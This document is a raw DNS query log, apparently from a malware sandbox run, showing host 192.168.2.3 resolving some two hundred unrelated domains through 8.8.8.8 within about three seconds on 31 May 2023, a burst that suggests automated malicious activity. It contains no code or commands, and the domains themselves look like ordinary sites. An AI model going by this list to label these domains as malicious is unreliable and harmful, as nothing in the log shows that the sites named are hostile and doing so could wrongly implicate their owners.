                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.327147961 CEST192.168.2.38.8.8.80x602cStandard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.352782011 CEST192.168.2.38.8.8.80xdf5fStandard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.443713903 CEST192.168.2.38.8.8.80xad84Standard query (0)impexnc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.487571001 CEST192.168.2.38.8.8.80xc385Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.489454031 CEST192.168.2.38.8.8.80xbfd3Standard query (0)web-york.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.501034021 CEST192.168.2.38.8.8.80xab0fStandard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.542049885 CEST192.168.2.38.8.8.80x4611Standard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.546876907 CEST192.168.2.38.8.8.80xa161Standard query (0)sjbmw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.562525988 CEST192.168.2.38.8.8.80xabfeStandard query (0)reproar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.581098080 CEST192.168.2.38.8.8.80x90ebStandard query (0)leapc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.584531069 CEST192.168.2.38.8.8.80xa41aStandard query (0)redgiga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.596127987 CEST192.168.2.38.8.8.80xd362Standard query (0)kallman.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.612442970 CEST192.168.2.38.8.8.80x2670Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.633754015 CEST192.168.2.38.8.8.80x8480Standard query (0)rkengg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.636895895 CEST192.168.2.38.8.8.80x3a58Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.644893885 CEST192.168.2.38.8.8.80xf58Standard query (0)clinicasanluis.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.646534920 CEST192.168.2.38.8.8.80xbba6Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.656764984 CEST192.168.2.38.8.8.80x8948Standard query (0)sgk.home.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.657501936 CEST192.168.2.38.8.8.80x65f1Standard query (0)assideum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.666194916 CEST192.168.2.38.8.8.80x11dfStandard query (0)sigtoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.669260025 CEST192.168.2.38.8.8.80xe811Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.672658920 CEST192.168.2.38.8.8.80x78c2Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.677516937 CEST192.168.2.38.8.8.80x98b3Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.712701082 CEST192.168.2.38.8.8.80xa3adStandard query (0)oaith.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.735905886 CEST192.168.2.38.8.8.80x1f37Standard query (0)ifesnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.776905060 CEST192.168.2.38.8.8.80x8444Standard query (0)www.diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.795310974 CEST192.168.2.38.8.8.80x741aStandard query (0)kumaden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.806788921 CEST192.168.2.38.8.8.80x1c0dStandard query (0)s5w.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.823553085 CEST192.168.2.38.8.8.80xedd5Standard query (0)akdeniz.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.826198101 CEST192.168.2.38.8.8.80x68a0Standard query (0)mackusick.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.827759027 CEST192.168.2.38.8.8.80x3151Standard query (0)gbmfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.834783077 CEST192.168.2.38.8.8.80x9b13Standard query (0)karmy.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.838896036 CEST192.168.2.38.8.8.80xc6deStandard query (0)roewer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.845812082 CEST192.168.2.38.8.8.80xd508Standard query (0)dhh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.880522013 CEST192.168.2.38.8.8.80x8035Standard query (0)karmy.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.938569069 CEST192.168.2.38.8.8.80x9592Standard query (0)rappich.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.948254108 CEST192.168.2.38.8.8.80x431Standard query (0)acraloc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.956687927 CEST192.168.2.38.8.8.80x66e1Standard query (0)hyab.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.038872957 CEST192.168.2.38.8.8.80x54ceStandard query (0)rokoron.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.043061972 CEST192.168.2.38.8.8.80x5bb2Standard query (0)ramkome.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.127060890 CEST192.168.2.38.8.8.80x8107Standard query (0)wahw.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.148426056 CEST192.168.2.38.8.8.80x92b6Standard query (0)nels.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.150060892 CEST192.168.2.38.8.8.80xf45fStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.157800913 CEST192.168.2.38.8.8.80x2338Standard query (0)icd-host.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.169850111 CEST192.168.2.38.8.8.80x3b47Standard query (0)ldh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.172524929 CEST192.168.2.38.8.8.80xb29dStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.208091021 CEST192.168.2.38.8.8.80xaeb1Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.208091021 CEST192.168.2.38.8.8.80x82a4Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.226178885 CEST192.168.2.38.8.8.80xb1bStandard query (0)orbitgas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.227066994 CEST192.168.2.38.8.8.80xe171Standard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.233939886 CEST192.168.2.38.8.8.80xbb68Standard query (0)karila.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.233939886 CEST192.168.2.38.8.8.80x2317Standard query (0)insia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.236020088 CEST192.168.2.38.8.8.80xa042Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.277062893 CEST192.168.2.38.8.8.80x59f0Standard query (0)hyab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.300910950 CEST192.168.2.38.8.8.80xbfd8Standard query (0)cpmteam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.348402023 CEST192.168.2.38.8.8.80xaa32Standard query (0)orlyhotel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.368542910 CEST192.168.2.38.8.8.80xb18aStandard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.375330925 CEST192.168.2.38.8.8.80x83dStandard query (0)holp-ai.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.436319113 CEST192.168.2.38.8.8.80x602Standard query (0)shesfit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.439774990 CEST192.168.2.38.8.8.80x80edStandard query (0)magicomm.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.458281994 CEST192.168.2.38.8.8.80xe3f6Standard query (0)redgiga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.478961945 CEST192.168.2.38.8.8.80x26bdStandard query (0)notis.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.553284883 CEST192.168.2.38.8.8.80x1567Standard query (0)willsub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.556173086 CEST192.168.2.38.8.8.80x40d9Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.606621027 CEST192.168.2.38.8.8.80xd1f3Standard query (0)alexpope.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.610661030 CEST192.168.2.38.8.8.80x2670Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.648308039 CEST192.168.2.38.8.8.80x974Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.658011913 CEST192.168.2.38.8.8.80x523dStandard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.662111998 CEST192.168.2.38.8.8.80x7e53Standard query (0)ntc.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.694128990 CEST192.168.2.38.8.8.80xc09bStandard query (0)bossinst.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.696602106 CEST192.168.2.38.8.8.80x4121Standard query (0)bible.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.700398922 CEST192.168.2.38.8.8.80xb255Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.707690001 CEST192.168.2.38.8.8.80x8c01Standard query (0)alexpope.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.736989975 CEST192.168.2.38.8.8.80x713fStandard query (0)sledsport.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.739242077 CEST192.168.2.38.8.8.80x13aStandard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.755880117 CEST192.168.2.38.8.8.80x904Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.789798975 CEST192.168.2.38.8.8.80xd78dStandard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.832597017 CEST192.168.2.38.8.8.80x4cbcStandard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.863111019 CEST192.168.2.38.8.8.80x4500Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.885674953 CEST192.168.2.38.8.8.80xa665Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.889791012 CEST192.168.2.38.8.8.80xe9a0Standard query (0)lyto.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.911622047 CEST192.168.2.38.8.8.80x7c84Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.080523968 CEST192.168.2.38.8.8.80xdb2bStandard query (0)s5w.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.253756046 CEST192.168.2.38.8.8.80xde90Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.363523960 CEST192.168.2.38.8.8.80xa042Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.452368975 CEST192.168.2.38.8.8.80x3ba1Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.539695978 CEST192.168.2.38.8.8.80xfdadStandard query (0)nels.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.581098080 CEST192.168.2.38.8.8.80xa722Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.589701891 CEST192.168.2.38.8.8.80xa830Standard query (0)a-domani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.641433001 CEST192.168.2.38.8.8.80x523bStandard query (0)captlfix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.648149014 CEST192.168.2.38.8.8.80x20a4Standard query (0)ifesnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.651264906 CEST192.168.2.38.8.8.80x7c06Standard query (0)dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.687128067 CEST192.168.2.38.8.8.80xb835Standard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.689461946 CEST192.168.2.38.8.8.80x1051Standard query (0)uhsa.edu.agA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.690548897 CEST192.168.2.38.8.8.80xa204Standard query (0)semuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.776890039 CEST192.168.2.38.8.8.80x7ad3Standard query (0)lyto.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.779650927 CEST192.168.2.38.8.8.80xe826Standard query (0)jnf.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.781172037 CEST192.168.2.38.8.8.80xd095Standard query (0)nme.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.782484055 CEST192.168.2.38.8.8.80xd842Standard query (0)kavram.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.810664892 CEST192.168.2.38.8.8.80xa730Standard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.811662912 CEST192.168.2.38.8.8.80xf7b5Standard query (0)ascc.org.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.812210083 CEST192.168.2.38.8.8.80xc44dStandard query (0)ossir.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.813572884 CEST192.168.2.38.8.8.80x2295Standard query (0)zugseil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.813760042 CEST192.168.2.38.8.8.80x646fStandard query (0)rappich.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.822973967 CEST192.168.2.38.8.8.80x974Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.841401100 CEST192.168.2.38.8.8.80x4e22Standard query (0)sledsport.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.841999054 CEST192.168.2.38.8.8.80xf9c0Standard query (0)web-york.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.842648983 CEST192.168.2.38.8.8.80x6afaStandard query (0)captlfix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.843219995 CEST192.168.2.38.8.8.80x9a34Standard query (0)snf.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.844578981 CEST192.168.2.38.8.8.80xd26eStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.844866991 CEST192.168.2.38.8.8.80xbcdcStandard query (0)shiner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.845232010 CEST192.168.2.38.8.8.80x1858Standard query (0)simetar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.845504999 CEST192.168.2.38.8.8.80xf392Standard query (0)rast.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.868853092 CEST192.168.2.38.8.8.80xf699Standard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.874835014 CEST192.168.2.38.8.8.80x7479Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.876331091 CEST192.168.2.38.8.8.80xc5d0Standard query (0)themark.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.894301891 CEST192.168.2.38.8.8.80x4f3aStandard query (0)kustnara.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.894586086 CEST192.168.2.38.8.8.80x86b7Standard query (0)themark.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.895370960 CEST192.168.2.38.8.8.80x69b6Standard query (0)yasuma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.895826101 CEST192.168.2.38.8.8.80x5a08Standard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.900240898 CEST192.168.2.38.8.8.80x73cStandard query (0)johnlyon.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.908587933 CEST192.168.2.38.8.8.80x5addStandard query (0)dog-jog.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.921250105 CEST192.168.2.38.8.8.80x36c3Standard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.922652006 CEST192.168.2.38.8.8.80x667fStandard query (0)zupraha.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.931862116 CEST192.168.2.38.8.8.80x3872Standard query (0)biosolve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.933021069 CEST192.168.2.38.8.8.80x11b1Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.933339119 CEST192.168.2.38.8.8.80x747dStandard query (0)ossir.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.934838057 CEST192.168.2.38.8.8.80x6ddaStandard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.936741114 CEST192.168.2.38.8.8.80x27beStandard query (0)siongann.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.938807011 CEST192.168.2.38.8.8.80x9669Standard query (0)enguita.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.945867062 CEST192.168.2.38.8.8.80xa777Standard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.947324038 CEST192.168.2.38.8.8.80x73b9Standard query (0)pellys.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.951972961 CEST192.168.2.38.8.8.80x401eStandard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.953587055 CEST192.168.2.38.8.8.80xc4e8Standard query (0)aiolos-sa.grA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.963557005 CEST192.168.2.38.8.8.80x91ebStandard query (0)avse.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.966824055 CEST192.168.2.38.8.8.80xc5cStandard query (0)johnlyon.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.968327045 CEST192.168.2.38.8.8.80xf29fStandard query (0)vvsteknik.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.978360891 CEST192.168.2.38.8.8.80xae6dStandard query (0)notis.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.986561060 CEST192.168.2.38.8.8.80x8677Standard query (0)floopis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.989118099 CEST192.168.2.38.8.8.80x7743Standard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.991997004 CEST192.168.2.38.8.8.80x420eStandard query (0)mijash3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.993702888 CEST192.168.2.38.8.8.80x9e96Standard query (0)ssm.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.997687101 CEST192.168.2.38.8.8.80xec0eStandard query (0)fogra.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.999429941 CEST192.168.2.38.8.8.80xe2f5Standard query (0)top1oil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.003700018 CEST192.168.2.38.8.8.80xab3bStandard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.011346102 CEST192.168.2.38.8.8.80xed18Standard query (0)xult.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.012809992 CEST192.168.2.38.8.8.80x2b35Standard query (0)tcpoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.013803005 CEST192.168.2.38.8.8.80xc396Standard query (0)onzcda.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.016036034 CEST192.168.2.38.8.8.80x41bfStandard query (0)komie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.017744064 CEST192.168.2.38.8.8.80x4313Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.040147066 CEST192.168.2.38.8.8.80xa8f3Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.044944048 CEST192.168.2.38.8.8.80x5ad0Standard query (0)fundeo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.051115036 CEST192.168.2.38.8.8.80xcbc2Standard query (0)infotech.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.056932926 CEST192.168.2.38.8.8.80xd9a4Standard query (0)siongann.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.060206890 CEST192.168.2.38.8.8.80xaedStandard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.064220905 CEST192.168.2.38.8.8.80x12b6Standard query (0)biurohera.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.068865061 CEST192.168.2.38.8.8.80x5588Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.073470116 CEST192.168.2.38.8.8.80x6dc7Standard query (0)nblewis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.078325033 CEST192.168.2.38.8.8.80xa95eStandard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.081044912 CEST192.168.2.38.8.8.80x9f87Standard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.091917038 CEST192.168.2.38.8.8.80x5b44Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.100701094 CEST192.168.2.38.8.8.80x71a0Standard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.101227999 CEST192.168.2.38.8.8.80x6deStandard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.105593920 CEST192.168.2.38.8.8.80x687aStandard query (0)bosado.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.110883951 CEST192.168.2.38.8.8.80xf988Standard query (0)amerifor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.122674942 CEST192.168.2.38.8.8.80xb060Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.123416901 CEST192.168.2.38.8.8.80x2cbaStandard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.124372005 CEST192.168.2.38.8.8.80xc08eStandard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.128242970 CEST192.168.2.38.8.8.80xe21dStandard query (0)skgm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.142739058 CEST192.168.2.38.8.8.80xf9cdStandard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.145874023 CEST192.168.2.38.8.8.80x25a4Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.163009882 CEST192.168.2.38.8.8.80x2d71Standard query (0)uhsa.edu.agA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.174442053 CEST192.168.2.38.8.8.80xf73fStandard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.198483944 CEST192.168.2.38.8.8.80x30c1Standard query (0)bossinst.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.200236082 CEST192.168.2.38.8.8.80xecdfStandard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.220551014 CEST192.168.2.38.8.8.80x47d3Standard query (0)someikan.comA (IP address)IN (0x0001)false
